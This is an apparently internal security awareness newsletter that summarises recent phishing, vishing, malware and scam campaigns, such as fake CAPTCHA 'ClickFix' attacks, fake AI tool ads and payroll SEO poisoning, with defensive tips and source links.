This is a monthly newsletter I put together for an internal security awareness program. Feel Free to grab and use for your own program.
Be Cautious of Government Emails About Unpaid Tolls and Other Urgent Matters
Have you recently received an email from a government agency about an unpaid toll or another urgent issue? It's important to be extra careful, as cybercriminals are now exploiting official government email systems to send out scam messages.
Key Insights:
Scammers are using official-looking emails that appear to come from legitimate government departments.
A common scam involves emails claiming unpaid tolls and urging you to click a link to pay.
Be wary of urgent requests for information or payment designed to pressure you.
Always check the actual web address of a link by hovering over it without clicking. Suspicious or non-official links should be avoided.
Never share personal or financial information through links in suspicious emails.
Independently verify any questionable government emails by contacting the agency directly through their official website or phone number.
Further Reading: TechCrunch
Beware of Crypto Scams Promoted Through Hacked Social Media
The Internet Crime Complaint Center (IC3) has issued a public service announcement warning about a growing trend: scammers are taking over social media accounts and using them to trick people into investing in fake cryptocurrency schemes. These scams can look very convincing because they appear to come from accounts you or your friends might already follow.
Key Insights to Protect Yourself:
Be suspicious of investment opportunities shared via social media: Even if a post comes from a friend's account, be very cautious about any cryptocurrency investment being promoted. Their account may have been hacked.
Look for red flags in investment promises: Be wary of claims of guaranteed high returns with little to no risk. Legitimate investments always carry some level of risk.
Don't rush into investment decisions: Scammers often create a sense of urgency to pressure you into investing quickly before you have time to think it over or do your research.
Verify the information through official sources: Before investing in any cryptocurrency opportunity, independently research the platform or opportunity through trusted financial news outlets and official cryptocurrency websites. Don't rely solely on what you see on social media.
Be cautious of direct messages about investments: If you receive unsolicited direct messages on social media encouraging you to invest in cryptocurrency, treat them with extreme caution, even if they appear to be from someone you know.
Report suspicious activity: If you see suspicious cryptocurrency promotions on social media, report them to the platform. If you have been a victim of such a scam, file a complaint with the IC3 at ic3.gov.
Remember: If an investment opportunity sounds too good to be true, it probably is.
Further Reading: IC3
Hacked TikTok Videos Push Fake Apps and Steal Your Info!
Trend Micro researchers have uncovered a concerning new trend: videos on TikTok are promoting what appear to be pirated apps, but are actually designed to trick you into downloading dangerous "infostealer" malware like Vidar and StealC. These videos use clever social engineering, providing step-by-step instructions that lead users to compromise their own systems.
Key Insights:
Be Skeptical of "Free" Pirated Apps: If an offer seems too good to be true, especially for paid software offered for free, it's very likely a scam.
Avoid Unsolicited Technical Instructions: Never follow commands or instructions from untrusted sources, particularly if they tell you to disable security features or run unusual software.
Verify Video Sources: Just because a video is popular doesn't mean it's legitimate. Be cautious of content that pushes you to download files or visit external sites.
Recognize Social Engineering: Scammers use convincing visuals and instructions to make their malicious content seem harmless and easy to follow. Always pause and think before acting.
Further Reading: Trend Micro
Watch Out for Payroll Scams and Fake Login Pages!
Cybercriminals are getting sneakier, using new tricks to steal your paycheck. A recent alert highlights how attackers are using "SEO poisoning" to create fake payroll login pages that show up at the top of search results. If you fall for it and enter your login details, they can change your direct deposit information and reroute your pay!
Key Insights:
Access Payroll Directly: Don't rely on search engines. Always go to your payroll portal by typing the official website address directly into your browser or using a trusted bookmark.
Enable Multi-Factor Authentication (MFA): If your payroll portal offers MFA (like a code sent to your phone), enable it! This adds an extra layer of security.
Be Wary of Suspicious Changes: Set up alerts in your payroll software to notify you of any changes to your direct deposit information. If you get an unexpected alert, investigate immediately.
Report Unauthorized Changes: Know how to report any unauthorized changes or suspicious activity to your HR or IT department right away.
Update Your Devices: Keep your home office routers and mobile devices updated with the latest software and use strong, unique passwords. Attackers can exploit weaknesses in outdated systems to hide their activities.
Further Reading: ReliaQuest
Deceptive CAPTCHA "ClickFix" Campaign Uses Clipboard Injection to Deliver Malware
Threat actors are employing a new social engineering campaign, dubbed "ClickFix," that utilizes fake CAPTCHA prompts on compromised or cloned websites. This sophisticated technique tricks users into launching malware by combining clipboard injection with abuse of the Windows Run dialog, leading to the delivery of payloads like Lumma Stealer and NetSupport RAT.
Key Insights:
Social Engineering Focus: The campaign heavily relies on user fatigue with CAPTCHA mechanisms, guiding victims through seemingly familiar steps to execute malicious code.
Clipboard Injection & Run Dialog Abuse: The core of the attack involves copying a malicious PowerShell or mshta command to the clipboard, which users are then instructed to paste and execute in the Windows Run dialog.
Living Off the Land Binaries (LOLBins): Attackers extensively use trusted system binaries like PowerShell, mshta.exe, and certutil.exe to bypass traditional security defenses, making detection challenging.
Payloads: Frequently observed payloads include infostealers (e.g., Lumma Stealer targeting browser data, credentials, and crypto wallets) and remote access tools (e.g., NetSupport RAT for full system access).
Simplicity and Effectiveness: The campaign's success stems from its simplicity, avoiding zero-day exploits or complex hidden mechanisms, relying instead on user interaction.
Proactive Defense: This campaign underscores the need for robust endpoint detection and response (EDR) solutions capable of behavioral analysis and detection of LOLBin abuse, alongside user education on suspicious CAPTCHA prompts and the dangers of pasting unknown commands.
Further Reading: SecurityOnline.info
Cybercriminals Exploit AI Hype to Spread Malware
Cybercriminals are increasingly exploiting the public's interest in artificial intelligence by creating fake AI-themed websites and advertisements to distribute malware. A recent campaign identified by Mandiant Threat Defense involves the threat group UNC6032 using deceptive ads on platforms like Facebook and LinkedIn to lure users into downloading malicious software disguised as AI video generation tools.
Key Insights:
Deceptive Advertising: Thousands of malicious ads have been disseminated, impersonating legitimate AI tools such as Luma AI and Canva Dream Lab. These ads direct users to fraudulent websites designed to mimic authentic AI services.
Malware Deployment: Upon interacting with these fake sites, users are prompted to download a ZIP file containing the STARKVEIL malware dropper. This dropper installs multiple malware components, including GRIMPULL, XWORM, and FROSTRIFT, which are designed to steal sensitive information and establish persistent access to the victim's system.
Information Theft: The deployed malware targets a range of data, including login credentials, cookies, credit card information, and digital wallet contents. Some components, like XWORM, also perform keylogging and screen capture, further compromising user privacy.
Evasion Techniques: The malware employs sophisticated methods to avoid detection, such as using Braille pattern blank characters to obscure file extensions and leveraging legitimate processes for malicious activities.
This campaign underscores the importance of vigilance when engaging with online advertisements, especially those offering AI-related services. Users should be cautious of unsolicited offers and verify the legitimacy of websites before downloading any software.
Further Reading: Google Cloud Blog
Beyond the Kill Chain: How Cybercriminals Invest Their Profits
Sophos X-Ops' five-part series, Beyond the Kill Chain, explores what happens after a successful cyberattack. The series reveals how financially motivated threat actors invest their illicit earnings—often blending legitimate business with ethically questionable and outright criminal ventures.
Key Insights:
Legitimate Business Ventures: Cybercriminals are investing in seemingly lawful enterprises such as restaurants, real estate, and e-commerce platforms. These ventures help launder money while also creating additional income streams.
Ethically Dubious Activities: Some threat actors operate in legal gray zones, selling spyware, monetizing vulnerability research under the guise of security services, or manipulating online traffic for advertising profits.
Criminal Enterprises: Illicit gains are also funneled into traditional criminal operations like counterfeit goods, drug trafficking, and underground gambling, showing how cybercrime supports broader organized crime ecosystems.
Implications for Cybersecurity: Mapping how threat actors reinvest their profits helps threat intelligence teams understand evolving risk models and disrupt the infrastructure supporting ongoing cybercriminal activity.
Further Reading: Sophos News
CFOs Targeted in Sophisticated Spear-Phishing Campaign
A recent spear-phishing campaign is targeting Chief Financial Officers (CFOs) and finance executives across banking, energy, insurance, and investment sectors in regions including Europe, Africa, Canada, the Middle East, and South Asia. The attackers use a multi-stage approach to deploy NetBird, a legitimate WireGuard-based remote access tool, onto compromised systems.
Key Insights:
Deceptive Recruitment Emails: The campaign begins with emails impersonating a Rothschild & Co recruiter offering a “strategic opportunity.” Victims are directed to a Firebase-hosted page featuring a custom CAPTCHA to access a malicious file.
Malicious Payload Delivery: After solving the CAPTCHA, users download a ZIP file containing a VBS script. When executed, it installs NetBird and OpenSSH, creates a hidden local admin account, and enables Remote Desktop Protocol (RDP) for persistent attacker access.
Evasion Techniques: The use of custom CAPTCHAs and trusted hosting services helps the attackers bypass traditional security defenses and increases credibility.
Attribution: Some infrastructure overlaps with known nation-state campaigns, but the specific threat actor remains unidentified.
Further Reading: Trellix Blog
Threat Actors Exploit Google Apps Script for Evasive Phishing Attacks
Threat actors are leveraging Google's Apps Script platform to host phishing pages that appear legitimate, allowing them to steal login credentials. These campaigns often begin with emails posing as invoice notifications, linking to webpages hosted using Google Apps Script. By operating within Google's trusted environment, attackers make their phishing pages seem more authentic, increasing the chances of success.
Key Insights:
Abuse of Trusted Services: Google Apps Script, a JavaScript-based platform used for automating Google Workspace tasks, is being exploited to host fake login pages that capture user credentials and send them to attacker-controlled servers.
Evasion of Security Measures: Because the scripts are hosted on Google's own domain, they can bypass traditional email and web filters that typically block suspicious domains.
Sophisticated Phishing Techniques: The phishing emails and login prompts are convincingly designed to mimic legitimate services, making it more likely that targets will engage and provide sensitive information.
Further Reading: BleepingComputer
Cybercriminals Use Fake Booking Sites to Spread AsyncRAT Malware
Cybercriminals are exploiting fake Booking.com websites to infect users with AsyncRAT, a remote access trojan. Victims are lured through deceptive ads and social media links to counterfeit booking sites, where they are tricked into running a malicious PowerShell script. The attack results in full remote control of the infected system, putting sensitive personal information at risk.
Key Insights:
Attackers use fake CAPTCHA prompts to manipulate users into executing malware.
The AsyncRAT payload allows for full system access, including surveillance and data theft.
Domains rotate every few days, making detection and blocking more difficult.
Further Reading: Malwarebytes Blog
UNC6040 – Voice Phishing to Salesforce Data Extortion
Google Threat Intelligence Group (GTIG) is tracking UNC6040, a financially motivated threat cluster specializing in voice phishing (vishing) campaigns. This group is successfully impersonating IT support to gain access to organizations' Salesforce instances, primarily to steal large volumes of data for subsequent extortion. Their tactics rely heavily on manipulating end users rather than exploiting software vulnerabilities.
Key Insights:
Vishing is Key: UNC6040 uses convincing phone calls, often targeting English-speaking employees, to socially engineer access.
Salesforce Data Loader Abuse: They trick victims into authorizing malicious versions of Salesforce Data Loader, gaining broad access to exfiltrate sensitive data.
Lateral Movement: After Salesforce, they use stolen credentials for lateral movement into other cloud platforms like Okta and Microsoft 365.
No Platform Vulnerability: Attacks exploit user trust and process gaps, not inherent Salesforce flaws.
Persistent Threat: Extortion can occur months after the initial intrusion, indicating a patient and persistent threat.
Further Reading: The Cost of a Call: From Voice Phishing to Data Extortion